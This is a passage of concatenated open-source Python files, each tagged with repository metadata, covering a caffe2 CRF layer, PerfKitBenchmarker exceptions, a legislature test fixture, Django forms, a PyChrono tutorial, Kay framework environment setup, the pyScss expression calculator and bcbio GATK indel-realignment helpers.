            outputs=2,
            padding_width=1,
            end_padding_width=0
        )
        # Predecessor tags: labels without the trailing (EOS) entry.
        row_ids, _ = self.model.net.RemovePadding(
            [labels],
            outputs=2,
            padding_width=0,
            end_padding_width=1
        )
        # Since there is no multi-dimensional gather, I flatten the matrix to
        # a 1-d vector and transform the ids to (row_ids * num_columns +
        # column_ids) and do gather in 1-d
        num_columns_blob = self.model.net.ConstantFill(
            [row_ids],
            value=self.num_classes_padded,
        )
        flattened_ids = self.model.net.Mul([row_ids, num_columns_blob])
        flattened_ids = self.model.net.Add([flattened_ids, column_ids])
        flattened_transitions = self.model.net.FlattenToVec([transitions])
        entries = self.model.net.Gather(
            [flattened_transitions, flattened_ids],
            dense_gradient=True
        )
        return self.model.ReduceFrontSum(entries)

    def _gather_entries_sum(self, in_data, indices, index_size):
        """Sum the entries of in_data selected per row by indices (via one-hot)."""
        indices = self.model.net.Cast([indices], to='int64')
        index_size_blob = self.model.param_init_net.ConstantFill(
            [],
            shape=[1],
            value=index_size,
        )
        query_one_hot = self.model.net.OneHot(
            [indices, index_size_blob]
        )
        # Dot product of the flattened one-hot mask with the flattened data
        # picks exactly one entry per row; ReduceFrontSum totals them.
        flattend_query = self.model.net.FlattenToVec(query_one_hot)
        flattend_data = self.model.net.FlattenToVec(in_data)
        query_scores = self.model.net.DotProduct(
            [flattend_query, flattend_data]
        )
        final_sum = self.model.net.ReduceFrontSum([query_scores])
        return final_sum

    def _crf_forward(
        self,
        input_blob,
        initial_state,
        transitions_copy,
        seq_lengths=None
    ):
        """Run the forward recurrence and return the scalar log-partition."""
        # Build the RNN net and get the last timestep output
        out_last = self.build_crf_net(
            input_blob, initial_state, transitions_copy
        )
        out_last, _ = self.model.net.Reshape(
            [out_last],
            outputs=2,
            shape=(self.num_classes_padded,)
        )
        zero_segment_id = self.model.param_init_net.ConstantFill(
            [],
            value=0,
            shape=[self.num_classes_padded],
            dtype=core.DataType.INT32,
        )
        # Compute the accumulated total score of all the paths
        accum_score = self.model.net.SortedSegmentRangeLogSumExp(
            [out_last, zero_segment_id]
        )
        # Reshape to a scalar so the loss subtraction is well-formed.
        accum_score, _ = self.model.net.Reshape(
            accum_score,
            outputs=2,
            shape=()
        )
        return accum_score

    def build_crf_net(self, input_blob, initial_state, transitions):
        '''
        Adds the crf_net recurrent operator to the model.
        model: model_helper.ModelHelper object new operators would be added
        to
        input_blob: the input sequence in a format T x N x D
        where T is sequence size, N - batch size and D - input dimension
        ##Only supports batch-size 1##
        seq_lengths: blob containing sequence lengths (unused)
        '''
        scope = 'crf_net'

        def s(name):
            ''
            # We have to manually scope due to our internal/external blob
            # relationships.
            return "{}/{}".format(str(scope), str(name))

        step_model = model_helper.ModelHelper(name='crf_step',
                                              param_model=self.model)
        input_t, cell_t_prev, _ = (
            step_model.net.AddExternalInputs(
                core.ScopedBlobReference('input_t'),
                core.ScopedBlobReference('cell_t_prev'),
                transitions
            )
        )
        zero_segment_id = step_model.param_init_net.ConstantFill(
            [],
            [s('zero_segment_id')],
            value=0,
            shape=[self.num_classes_padded],
            dtype=core.DataType.INT32,
        )
        # A hack to bypass model cloning for test
        step_model.param_init_net.AddExternalOutput(zero_segment_id)
        """ the CRF step """
        # Do tile
        prev_transpose = brew.transpose(
            step_model,
            cell_t_prev,
            [s('prev_transpose')],
            axes=(0, 2, 1),
        )
        prev_tiled = step_model.net.Tile(
            prev_transpose,
            [s('prev_tiled')],
            tiles=self.num_classes_padded,
            axis=2,
        )
        input_t_tiled = step_model.net.Tile(
            input_t,
            [s('input_t_tiled')],
            tiles=self.num_classes_padded,
            axis=1,
        )
        input_with_prev = step_model.net.Add(
            [prev_tiled, input_t_tiled],
            [s('input_with_prev')]
        )
        # Broadcast-add the transition matrix to every (prev, next) pair.
        all_with_transitions = step_model.net.Add(
            [input_with_prev, transitions],
            [s('prev_with_transitions')],
            broadcast=1,
            use_grad_hack=1,
        )
        all_with_transitions_reshaped, _ = step_model.net.Reshape(
            all_with_transitions,
            [s('all_with_transitions_reshaped'), s('all_with_transitions_orig')],
            shape=(self.num_classes_padded, self.num_classes_padded)
        )
        # log-sum-exp over predecessor tags yields the new cell state.
        cell_t = step_model.net.SortedSegmentRangeLogSumExp(
            [all_with_transitions_reshaped, zero_segment_id],
            [s('cell_t')],
        )
        step_model.net.AddExternalOutputs(cell_t)
        """ recurrent network """
        cell_input_blob = initial_state
        out_all, out_last = recurrent.recurrent_net(
            net=self.model.net,
            cell_net=step_model.net,
            inputs=[(input_t, input_blob)],
            initial_cell_inputs=[
                (cell_t_prev, cell_input_blob),
            ],
            links={
                cell_t_prev: cell_t,
            },
            scope=scope,
            outputs_with_grads=(1,)
        )
        return out_last

    def update_predictions(self, classes):
        """Return a predictions blob whose argmax per token lies on the Viterbi path."""

        def crf_update_predictions_op(inputs, outputs):
            # This operator will compute the best path of classes by performing
            # Viterbi decoding and then updates the predictions to make the tag
            # On the best path has the highest score among the others
            predictions = inputs[0].data
            transitions = inputs[1].data
            # NOTE(review): duplicate of the assignment two lines above.
            predictions = inputs[0].data
            predictions_shape = inputs[0].shape
            outputs[0].reshape(predictions_shape)
            # Standard Viterbi forward pass: trellis holds best path scores,
            # backpointers holds the argmax predecessor per (step, tag).
            trellis = np.zeros(predictions_shape)
            backpointers = np.zeros(predictions_shape, dtype=np.int32)
            trellis[0] = predictions[0]
            for t in range(1, predictions_shape[0]):
                v = np.expand_dims(trellis[t - 1], 1) + transitions
                trellis[t] = predictions[t] + np.max(v, 0)
                backpointers[t] = np.argmax(v, 0)
            # Backtrack from the best final tag.
            viterbi = [np.argmax(trellis[-1])]
            for bp in reversed(backpointers[1:]):
                viterbi.append(bp[viterbi[-1]])
            viterbi.reverse()
            new_predictions = np.zeros(predictions_shape)
            old_bests = []
            for i, w_predictions in enumerate(predictions):
                # Get the current tag with the maximum score
                new_predictions[i] = predictions[i]
                old_best = np.argmax(w_predictions)
                old_bests.append(old_best)
                # Swap the scores of the current best tag and the tag on the
                # Viterbi path
                w_predictions[viterbi[i]], w_predictions[old_best] = \
                    w_predictions[old_best], w_predictions[viterbi[i]]
                new_predictions[i] = w_predictions
            # Remove the BOS and EOS entries from the predictions matrix
            orig_predictions = new_predictions[1:-1, 0:-2]
            outputs[0].reshape(orig_predictions.shape)
            outputs[0].data[...] = orig_predictions

        padded_classes = self._pad_predictions(classes)
        new_classes = self.model.net.Python(crf_update_predictions_op)(
            [padded_classes, self.transitions],
            core.ScopedBlobReference('post_crf_classes')
        )
        return new_classes
| Yangqing/caffe2 | caffe2/python/crf.py | Python | apache-2.0 | 15,115 |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A common location for all perfkitbenchmarker-defined exceptions."""
import pprint
class Error(Exception):
    """Base class for all perfkitbenchmarker-defined exceptions."""
    pass
class VirtualMachine(object):
    """Errors raised by virtual_machine.py."""

    class RemoteExceptionError(Error):
        pass

    class VirtualMachineError(Error):
        """An error raised when VM is having an issue."""

        @classmethod
        def FromDebugInfo(cls, info, error_message):
            """Build a VirtualMachineError from collected debug information.

            Args:
                info: a dictionary of debug information (such as traceroute
                    output).
                error_message: the error message from the originating code.

            Returns:
                An instance of cls wrapping the formatted debug text.

            Raises:
                TypeError: if info is not an instance of dictionary.
            """
            if not isinstance(info, dict):
                raise TypeError('The argument of FromDebugInfo should be an instance '
                                'of dictionary.')
            details = VirtualMachine.VirtualMachineError.FormatDebugInfo(
                info, error_message)
            return cls(details)

        @staticmethod
        def FormatDebugInfo(info, error_message):
            """Render debug info as a human readable, sectioned string.

            Note: the 'traceroute' entry is removed from *info* as a side
            effect, so it is not repeated in the pretty-printed remainder.
            """
            divider = '\n' + '-' * 65 + '\n'

            def section(header, message):
                # One section: divider, header line, then the message line.
                return divider + ('%s\n%s\n' % (header, message))

            text = section('error_message:', error_message) if error_message else ''
            if 'traceroute' in info:
                text += section('traceroute:', info['traceroute'])
                del info['traceroute']
            return text + section('Debug Info:', pprint.pformat(info))

    class VmStateError(VirtualMachineError):
        pass
class VmUtil(object):
    """Errors raised by vm_utils.py."""

    class SshConnectionError(VirtualMachine.VirtualMachineError):
        """An error raised when VM is running but not SSHable."""
        pass

    # Exception names below describe their intended use; the actual raise
    # sites live in vm_utils.py.
    class RestConnectionError(Error):
        pass

    class IpParsingError(Error):
        pass

    class UserSetupError(Error):
        pass

    class ThreadException(Error):
        pass

    class CalledProcessException(Error):
        pass
class Benchmarks(object):
    """Errors raised by individual benchmark."""

    # Raised when a benchmark's prepare phase fails.
    class PrepareException(Error):
        pass

    class MissingObjectCredentialException(Error):
        pass

    # Raised when a benchmark's run phase fails.
    class RunError(Error):
        pass
class Resource(object):
    """Errors related to resource creation and deletion."""

    # 'Retryable' indicates the caller may retry the operation.
    class RetryableCreationError(Error):
        pass

    class RetryableDeletionError(Error):
        pass
| gablg1/PerfKitBenchmarker | perfkitbenchmarker/errors.py | Python | apache-2.0 | 3,525 |
# Fixture metadata for the fictional 'ex' (Example State) legislature used by
# billy's tests: three two-year terms (T0-T2) with their sessions, plus
# session_details mapping session ids to start timestamps (epoch seconds),
# a session type ('primary'/'special'), and display names.
metadata = {
    "abbreviation": "ex",
    "capitol_timezone": "Etc/UTC",
    "legislature_name": "Example Legislature",
    "lower_chamber_name": "House of Representatives",
    "lower_chamber_term": 2,
    "lower_chamber_title": "Representative",
    "upper_chamber_name": "Senate",
    "upper_chamber_term": 6,
    "upper_chamber_title": "Senator",
    "name": "Example State",
    "terms": [
        {
            "name": "T0",
            "sessions": [
                "S0"
            ],
            "start_year": 2009,
            "end_year": 2010
        },
        {
            "name": "T1",
            "sessions": [
                "S1", "Special1"
            ],
            "start_year": 2011,
            "end_year": 2012
        },
        {
            "name": "T2",
            "sessions": [
                "S2", "Special2"
            ],
            "start_year": 2013,
            "end_year": 2014
        }
    ],
    "session_details": {
        "S0": {"start_date": 1250000000.0, "type": "primary",
               "display_name": "Session Zero"},
        "S1": {"start_date": 1300000000.0, "type": "primary",
               "display_name": "Session One"},
        "Special1": {"start_date": 1330000000.0, "type": "special",
                     "display_name": "Special Session One"},
        "S2": {"start_date": 1350000000.0, "type": "primary",
               "display_name": "Session Two"},
        "Special2": {"start_date": 1360000000.0, "type": "special",
                     "display_name": "Special Session Two"}
    }
}
| mileswwatkins/billy | billy/tests/fixtures/ex/__init__.py | Python | bsd-3-clause | 1,554 |
"""
test_rdf_header.py -- show the rdf_header
Version 0.1 MC 2013-12-27
-- Initial version.
"""
__author__ = "Michael Conlon"
__copyright__ = "Copyright 2013, University of Florida"
__license__ = "BSD 3-Clause license"
__version__ = "0.1"
import vivotools as vt
from datetime import datetime
print datetime.now(),"Start"
print vt.rdf_header()
print datetime.now(),"Finish"
| mconlon17/vivo-1.6-upgrade | tools/test_rdf_header.py | Python | bsd-3-clause | 407 |
from django import forms
from models import FormDataGroup
import re
# On this page, users can upload an xsd file from their laptop
# Then they get redirected to a page where they can download the xsd
class RegisterXForm(forms.Form):
    """Form for uploading an XSD file and giving it a display name."""
    file = forms.FileField()  # the uploaded XSD file
    form_display_name= forms.CharField(max_length=128, label=u'Form Display Name')
class SubmitDataForm(forms.Form):
    """Form for uploading a single data submission file."""
    file = forms.FileField()
class FormDataGroupForm(forms.ModelForm):
    """ModelForm for editing a FormDataGroup's basic data.

    Exposes ``display_name`` and ``view_name``; ``view_name`` is validated
    to contain only word characters and to be unique when it is changed on
    an existing instance.
    """
    display_name = forms.CharField(widget=forms.TextInput(attrs={'size':'80'}))
    view_name = forms.CharField(widget=forms.TextInput(attrs={'size':'40'}))

    def clean_view_name(self):
        """Validate the view name (word characters only; unique if changed)."""
        view_name = self.cleaned_data["view_name"]
        if not re.match(r"^\w+$", view_name):
            raise forms.ValidationError("View name can only contain numbers, letters, and underscores!")
        # Only enforce uniqueness when editing an existing instance whose
        # view name actually changed.  NOTE(review): brand-new (unsaved)
        # instances skip this check entirely -- presumably uniqueness is
        # enforced elsewhere; verify before relying on it.
        if self.instance.id:
            name_changed = FormDataGroup.objects.get(id=self.instance.id).view_name != view_name
            # .exists() is the idiomatic (and cheaper) membership test,
            # instead of materializing a COUNT(*) via .count() > 0.
            if name_changed and FormDataGroup.objects.filter(view_name=view_name).exists():
                raise forms.ValidationError("Sorry, view name %s is already in use! Please pick a new one." % view_name)
        return view_name

    class Meta:
        model = FormDataGroup
        fields = ("display_name", "view_name")
| commtrack/commtrack-core | apps/xformmanager/forms.py | Python | bsd-3-clause | 1,428 |
#------------------------------------------------------------------------------
# Name: pychrono example
# Purpose:
#
# Author: Alessandro Tasora
#
# Created: 1/01/2019
# Copyright: (c) ProjectChrono 2019
#------------------------------------------------------------------------------
print ("First tutorial for PyChrono: vectors, matrices etc.");
# Load the Chrono::Engine core module!
import pychrono as chrono
try:
import numpy as np
from numpy import linalg as LA
except ImportError:
print("You need NumPyto run this demo!")
# Test logging
chrono.GetLog().Bar()
chrono.GetLog() << "result is: " << 11+1.5 << "\n"
chrono.GetLog().Bar()
# Test vectors
my_vect1 = chrono.ChVectorD()
my_vect1.x=5
my_vect1.y=2
my_vect1.z=3
my_vect2 = chrono.ChVectorD(3,4,5)
my_vect4 = my_vect1*10 + my_vect2
my_len = my_vect4.Length()
print ('vect sum =', my_vect1 + my_vect2)
print ('vect cross =', my_vect1 % my_vect2)  # '%' is overloaded as cross product
print ('vect dot =', my_vect1 ^ my_vect2)  # '^' is overloaded as dot product
# Test quaternions
# (operator overloads: '~' conjugate, '^' dot product, '%' quaternion product)
my_quat = chrono.ChQuaternionD(1,2,3,4)
my_qconjugate = ~my_quat
print ('quat. conjugate =', my_qconjugate)
print ('quat. dot product=', my_qconjugate ^ my_quat)
print ('quat. product=', my_qconjugate % my_quat)
# Test matrices and NumPy interoperability
mlist = [[1,2,3,4], [5,6,7,8], [9,10,11,12], [13,14,15,16]]
ma = chrono.ChMatrixDynamicD()
ma.SetMatr(mlist) # Create a Matrix from a list. Size is adjusted automatically.
npmat = np.asarray(ma.GetMatr()) # Create a 2D npy array from the list extracted from ChMatrixDynamic
w, v = LA.eig(npmat) # get eigenvalues and eigenvectors using numpy
mb = chrono.ChMatrixDynamicD(4,4)
prod = v * npmat # you can perform linear algebra operations with numpy and then feed results into a ChMatrixDynamicD using SetMatr
mb.SetMatr(v.tolist()) # create a ChMatrixDynamicD from the numpy eigenvectors
mr = chrono.ChMatrix33D()
mr.SetMatr([[1,2,3], [4,5,6], [7,8,9]])
print (mr*my_vect1);
# Test frames -
# create a frame representing a translation and a rotation
# of 20 degrees on X axis
my_frame = chrono.ChFrameD(my_vect2, chrono.Q_from_AngAxis(20*chrono.CH_C_DEG_TO_RAD, chrono.ChVectorD(1,0,0)))
# '>>' applies the frame transformation to the vector -- presumably
# local -> parent coordinates; confirm against the Chrono docs.
my_vect5 = my_vect1 >> my_frame
# Print the class hierarchy of a chrono class
import inspect
inspect.getmro(chrono.ChStreamOutAsciiFile)
# Use the ChFunction classes
my_funct = chrono.ChFunction_Sine(0,0.5,3)
print ('function f(0.2)=', my_funct.Get_y(0.2) )
# Inherit from the ChFunction, from the Python side,
# (do not forget the __init__ constructor)
class MySquareFunct (chrono.ChFunction):
    """Python-side ChFunction subclass computing y = x*x."""
    def __init__(self):
        # The base-class constructor must be called explicitly.
        chrono.ChFunction.__init__(self)
    def Get_y(self,x):
        return x*x
# Evaluate the custom function, plus the derivative supplied by the base class.
my_funct2 = MySquareFunct()
# BUGFIX: label previously said 'f(2)' although the value is evaluated at 3.
print ('function f(3) =', my_funct2.Get_y(3) )
print ('function df/dx=', my_funct2.Get_y_dx(3) )
| projectchrono/chrono | src/demos/python/core/demo_CH_coords.py | Python | bsd-3-clause | 2,825 |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import azure.cli.command_modules.consumption._help # pylint: disable=unused-import
def load_params(_):
    """Lazily load this command module's argument definitions (the import has side effects)."""
    import azure.cli.command_modules.consumption._params # pylint: disable=redefined-outer-name, unused-variable
def load_commands():
    """Lazily load this command module's command table (the import has side effects)."""
    import azure.cli.command_modules.consumption.commands # pylint: disable=redefined-outer-name, unused-variable
| QingChenmsft/azure-cli | src/command_modules/azure-cli-consumption/azure/cli/command_modules/consumption/__init__.py | Python | mit | 704 |
# -*- coding: utf-8 -*-
"""
Kay framework.
:Copyright: (c) 2009 Accense Technology, Inc.
Takashi Matsuo <tmatsuo@candit.jp>,
Ian Lewis <IanMLewis@gmail.com>
All rights reserved.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import logging
import settings
__version__ = "3.0.0"
__version_info__ = (3, 0, 0, 'final', 0)
KAY_DIR = os.path.abspath(os.path.dirname(__file__))
LIB_DIR = os.path.join(KAY_DIR, 'lib')
PROJECT_DIR = os.path.abspath(os.path.dirname(settings.__file__))
PROJECT_LIB_DIR = os.path.join(PROJECT_DIR, 'lib')
def setup_env(manage_py_env=False):
  """Configures app engine environment for command-line apps.

  Locates the Google App Engine SDK (either a directory or a zip file),
  adds it and its bundled libraries to sys.path, then calls setup().
  Exits the process if no SDK can be found.  Python 2 only.
  """
  # Try to import the appengine code from the system path.
  try:
    from google.appengine.api import apiproxy_stub_map
  except ImportError, e:
    # Not on the system path. Build a list of alternative paths where it
    # may be. First look within the project for a local copy, then look for
    # where the Mac OS SDK installs it.
    paths = [os.path.join(PROJECT_DIR, '.google_appengine'),
             '/usr/local/google_appengine']
    for path in os.environ.get('PATH', '').replace(';', ':').split(':'):
      path = path.rstrip(os.sep)
      if path.endswith('google_appengine'):
        paths.append(path)
    if os.name in ('nt', 'dos'):
      prefix = '%(PROGRAMFILES)s' % os.environ
      paths.append(prefix + r'\Google\google_appengine')
    # Loop through all possible paths and look for the SDK dir.
    SDK_PATH = None
    for sdk_path in paths:
      sdk_path = os.path.realpath(sdk_path)
      if os.path.exists(sdk_path):
        SDK_PATH = sdk_path
        break
    if SDK_PATH is None:
      # The SDK could not be found in any known location.
      sys.stderr.write('The Google App Engine SDK could not be found!\n'
                       'Please visit http://kay-docs.shehas.net/'
                       ' for installation instructions.\n')
      sys.exit(1)
    # Add the SDK and the libraries within it to the system path.
    SDK_PATH = os.path.realpath(SDK_PATH)
    # if SDK_PATH points to a file, it could be a zip file.
    if os.path.isfile(SDK_PATH):
      import zipfile
      gae_zip = zipfile.ZipFile(SDK_PATH)
      lib_prefix = os.path.join('google_appengine', 'lib')
      lib = os.path.join(SDK_PATH, lib_prefix)
      pkg_names = []
      # add all packages archived under lib in SDK_PATH zip.
      for filename in sorted(e.filename for e in gae_zip.filelist):
        # package should have __init__.py
        if (filename.startswith(lib_prefix) and
            filename.endswith('__init__.py')):
          pkg_path = filename.replace(os.sep+'__init__.py', '')
          # True package root should have __init__.py in upper directory,
          # thus we can treat only the shortest unique path as package root.
          for pkg_name in pkg_names:
            if pkg_path.startswith(pkg_name):
              break
          else:
            pkg_names.append(pkg_path)
      # insert populated EXTRA_PATHS into sys.path.
      EXTRA_PATHS = ([os.path.dirname(os.path.join(SDK_PATH, pkg_name))
                      for pkg_name in pkg_names]
                     + [os.path.join(SDK_PATH, 'google_appengine')])
      sys.path = EXTRA_PATHS + sys.path
      # tweak dev_appserver so to make zipimport and templates work well.
      from google.appengine.tools import dev_appserver
      # make GAE SDK to grant opening library zip.
      dev_appserver.FakeFile.ALLOWED_FILES.add(SDK_PATH)
      template_dir = 'google_appengine/templates/'
      dev_appserver.ApplicationLoggingHandler.InitializeTemplates(
        gae_zip.read(template_dir+dev_appserver.HEADER_TEMPLATE),
        gae_zip.read(template_dir+dev_appserver.SCRIPT_TEMPLATE),
        gae_zip.read(template_dir+dev_appserver.MIDDLE_TEMPLATE),
        gae_zip.read(template_dir+dev_appserver.FOOTER_TEMPLATE))
    # ... else it could be a directory.
    else:
      sys.path = [SDK_PATH] + sys.path
      from appcfg import EXTRA_PATHS as appcfg_EXTRA_PATHS
      from appcfg import GOOGLE_SQL_EXTRA_PATHS as appcfg_SQL_EXTRA_PATHS
      sys.path = sys.path + appcfg_EXTRA_PATHS + appcfg_SQL_EXTRA_PATHS
    # corresponds with another google package
    if sys.modules.has_key('google'):
      del sys.modules['google']
    # Retry the import now that the SDK is on sys.path.
    from google.appengine.api import apiproxy_stub_map
  setup()
  if not manage_py_env:
    return
  print 'Running on Kay-%s' % __version__
def setup():
  """Set up the runtime environment (currently just sys.path)."""
  setup_syspath()
def setup_syspath():
  """Prepend the project, kay lib, and project lib directories to sys.path.

  Resulting search order: PROJECT_LIB_DIR, LIB_DIR, PROJECT_DIR, then the
  pre-existing sys.path entries.  Directories already on sys.path are not
  added twice.
  """
  # Each directory is pushed onto the front, so the last one prepended
  # (PROJECT_LIB_DIR) ends up with the highest priority -- identical to
  # the previous unrolled version.  Also fixes the `not x in y` idiom.
  for path in (PROJECT_DIR, LIB_DIR, PROJECT_LIB_DIR):
    if path not in sys.path:
      sys.path = [path] + sys.path
| yosukesuzuki/kay-template | project/kay/__init__.py | Python | mit | 4,770 |
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import sys
import logging
from warnings import warn
import six
from scss.ast import Literal
from scss.cssdefs import _expr_glob_re, _interpolate_re
from scss.errors import SassError, SassEvaluationError, SassParseError
from scss.grammar.expression import SassExpression, SassExpressionScanner
from scss.rule import Namespace
from scss.types import String
from scss.types import Value
from scss.util import dequote
log = logging.getLogger(__name__)
class Calculator(object):
    """Expression evaluator."""
    # Cache of parsed ASTs keyed by (parser target, expression text).
    # Class-level, so it is shared by all Calculator instances.
    ast_cache = {}
    def __init__(
            self, namespace=None,
            ignore_parse_errors=False,
            undefined_variables_fatal=True,
    ):
        # namespace: variable/function scope used for lookups (fresh if None)
        # ignore_parse_errors: evaluate_expression returns None on parse errors
        # undefined_variables_fatal: raise (vs. log) on unknown $variables
        if namespace is None:
            self.namespace = Namespace()
        else:
            self.namespace = namespace
        self.ignore_parse_errors = ignore_parse_errors
        self.undefined_variables_fatal = undefined_variables_fatal
    def _pound_substitute(self, result):
        """Regex-callback for #{...}: evaluate the inner expression and render it."""
        expr = result.group(1)
        value = self.evaluate_expression(expr)
        if value is None:
            # Could not evaluate; fall back to plain variable interpolation.
            return self.apply_vars(expr)
        elif value.is_null:
            return ""
        else:
            return dequote(value.render())
    def do_glob_math(self, cont):
        """Performs #{}-interpolation. The result is always treated as a fixed
        syntactic unit and will not be re-evaluated.
        """
        # TODO that's a lie! this should be in the parser for most cases.
        if not isinstance(cont, six.string_types):
            warn(FutureWarning(
                "do_glob_math was passed a non-string {0!r} "
                "-- this will no longer be supported in pyScss 2.0"
                .format(cont)
            ))
            cont = six.text_type(cont)
        if '#{' not in cont:
            # Fast path: nothing to interpolate.
            return cont
        cont = _expr_glob_re.sub(self._pound_substitute, cont)
        return cont
    def apply_vars(self, cont):
        """Substitute $variables in *cont*, then apply #{}-interpolation."""
        # TODO this is very complicated. it should go away once everything
        # valid is actually parseable.
        if isinstance(cont, six.string_types) and '$' in cont:
            try:
                # Optimization: the full cont is a variable in the context,
                cont = self.namespace.variable(cont)
            except KeyError:
                # Interpolate variables:
                def _av(m):
                    v = None
                    n = m.group(2)
                    try:
                        v = self.namespace.variable(n)
                    except KeyError:
                        if self.undefined_variables_fatal:
                            raise SyntaxError("Undefined variable: '%s'." % n)
                        else:
                            log.error("Undefined variable '%s'", n, extra={'stack': True})
                            return n
                    else:
                        if v:
                            if not isinstance(v, Value):
                                raise TypeError(
                                    "Somehow got a variable {0!r} "
                                    "with a non-Sass value: {1!r}"
                                    .format(n, v)
                                )
                            v = v.render()
                            # TODO this used to test for _dequote
                            if m.group(1):
                                v = dequote(v)
                        else:
                            v = m.group(0)
                    return v
                cont = _interpolate_re.sub(_av, cont)
            else:
                # Variable succeeded, so we need to render it
                cont = cont.render()
        # TODO this is surprising and shouldn't be here
        cont = self.do_glob_math(cont)
        return cont
    def calculate(self, expression, divide=False):
        """Evaluate *expression*; on failure fall back to an unquoted string."""
        result = self.evaluate_expression(expression, divide=divide)
        if result is None:
            return String.unquoted(self.apply_vars(expression))
        return result
    # TODO only used by magic-import...?
    def interpolate(self, var):
        """Look up *var* and, if the value is itself a string, try evaluating it."""
        value = self.namespace.variable(var)
        if var != value and isinstance(value, six.string_types):
            _vi = self.evaluate_expression(value)
            if _vi is not None:
                value = _vi
        return value
    def evaluate_expression(self, expr, divide=False):
        """Parse and evaluate *expr*; returns None on parse error when
        ignore_parse_errors is set."""
        try:
            ast = self.parse_expression(expr)
        except SassError as e:
            if self.ignore_parse_errors:
                return None
            raise
        try:
            return ast.evaluate(self, divide=divide)
        except Exception as e:
            six.reraise(SassEvaluationError, SassEvaluationError(e, expression=expr), sys.exc_info()[2])
    def parse_expression(self, expr, target='goal'):
        """Parse *expr* with the grammar rule *target*, caching the AST."""
        if isinstance(expr, six.text_type):
            # OK
            pass
        elif isinstance(expr, six.binary_type):
            # Dubious
            warn(FutureWarning(
                "parse_expression was passed binary data {0!r} "
                "-- this will no longer be supported in pyScss 2.0"
                .format(expr)
            ))
            # Don't guess an encoding; you reap what you sow
            expr = six.text_type(expr)
        else:
            raise TypeError("Expected string, got %r" % (expr,))
        key = (target, expr)
        if key in self.ast_cache:
            return self.ast_cache[key]
        try:
            parser = SassExpression(SassExpressionScanner(expr))
            ast = getattr(parser, target)()
        except SyntaxError as e:
            # NOTE(review): if SassExpressionScanner() itself raised,
            # `parser` would be unbound here -- confirm that cannot happen.
            raise SassParseError(e, expression=expr, expression_pos=parser._char_pos)
        self.ast_cache[key] = ast
        return ast
    def parse_interpolations(self, string):
        """Parse a string for interpolations, but don't treat anything else as
        Sass syntax. Returns an AST node.
        """
        # Shortcut: if there are no #s in the string in the first place, it
        # must not have any interpolations, right?
        if '#' not in string:
            return Literal(String.unquoted(string))
        return self.parse_expression(string, 'goal_interpolated_literal')
    def parse_vars_and_interpolations(self, string):
        """Parse a string for variables and interpolations, but don't treat
        anything else as Sass syntax. Returns an AST node.
        """
        # Shortcut: if there are no #s or $s in the string in the first place,
        # it must not have anything of interest.
        if '#' not in string and '$' not in string:
            return Literal(String.unquoted(string))
        return self.parse_expression(
            string, 'goal_interpolated_literal_with_vars')
__all__ = ('Calculator',)
| cpfair/pyScss | scss/calculator.py | Python | mit | 6,935 |
"""Perform realignment of BAM files around indels using the GATK toolkit.
"""
import os
import shutil
from contextlib import closing
import pysam
from bcbio import bam, broad
from bcbio.bam import ref
from bcbio.log import logger
from bcbio.utils import file_exists
from bcbio.distributed.transaction import file_transaction, tx_tmpdir
from bcbio.pipeline.shared import subset_bam_by_region, subset_variant_regions
from bcbio.provenance import do
# ## GATK realignment
def gatk_realigner_targets(runner, align_bam, ref_file, config, dbsnp=None,
                           region=None, out_file=None, deep_coverage=False,
                           variant_regions=None, known_vrns=None):
    """Generate a list of interval regions for realignment around indels.

    Runs GATK RealignerTargetCreator via *runner* and returns the path to
    the resulting ``.intervals`` file.  NOTE(review): the ``dbsnp``
    parameter is accepted but never used here -- known indels are supplied
    through ``known_vrns['train_indels']`` instead; confirm with callers.
    """
    if not known_vrns:
        known_vrns = {}
    if out_file:
        out_file = "%s.intervals" % os.path.splitext(out_file)[0]
    else:
        out_file = "%s-realign.intervals" % os.path.splitext(align_bam)[0]
    # check only for file existence; interval files can be empty after running
    # on small chromosomes, so don't rerun in those cases
    if not os.path.exists(out_file):
        with file_transaction(config, out_file) as tx_out_file:
            logger.debug("GATK RealignerTargetCreator: %s %s" %
                         (os.path.basename(align_bam), region))
            params = ["-T", "RealignerTargetCreator",
                      "-I", align_bam,
                      "-R", ref_file,
                      "-o", tx_out_file,
                      "-l", "INFO",
                      ]
            # Restrict to the intersection of the requested region and any
            # configured variant regions.
            region = subset_variant_regions(variant_regions, region, tx_out_file)
            if region:
                params += ["-L", region, "--interval_set_rule", "INTERSECTION"]
            if known_vrns.get("train_indels"):
                params += ["--known", known_vrns["train_indels"]]
            if deep_coverage:
                params += ["--mismatchFraction", "0.30",
                           "--maxIntervalSize", "650"]
            runner.run_gatk(params, memscale={"direction": "decrease", "magnitude": 2})
    return out_file
def gatk_indel_realignment_cl(runner, align_bam, ref_file, intervals,
                              tmp_dir, region=None, deep_coverage=False,
                              known_vrns=None):
    """Prepare input arguments for GATK indel realignment.

    Returns the command line produced by ``runner.cl_gatk`` for running
    IndelRealigner over *align_bam* with the given target *intervals*.
    """
    if not known_vrns:
        known_vrns = {}
    params = ["-T", "IndelRealigner",
              "-I", align_bam,
              "-R", ref_file,
              "-targetIntervals", intervals,
              ]
    if region:
        params += ["-L", region]
    if known_vrns.get("train_indels"):
        params += ["--knownAlleles", known_vrns["train_indels"]]
    if deep_coverage:
        # Higher limits for deep-coverage data so realignment still completes.
        params += ["--maxReadsInMemory", "300000",
                   "--maxReadsForRealignment", str(int(5e5)),
                   "--maxReadsForConsensuses", "500",
                   "--maxConsensuses", "100"]
    return runner.cl_gatk(params, tmp_dir)
# ## Utilities
def has_aligned_reads(align_bam, region=None):
    """Check if the aligned BAM file has any reads in the region.
    region can be a chromosome string ("chr22"),
    a tuple region (("chr22", 1, 100)) or a file of regions.
    """
    import pybedtools
    if region is not None:
        # basestring: this module is Python 2 only.
        if isinstance(region, basestring) and os.path.isfile(region):
            regions = [tuple(r) for r in pybedtools.BedTool(region)]
        else:
            regions = [region]
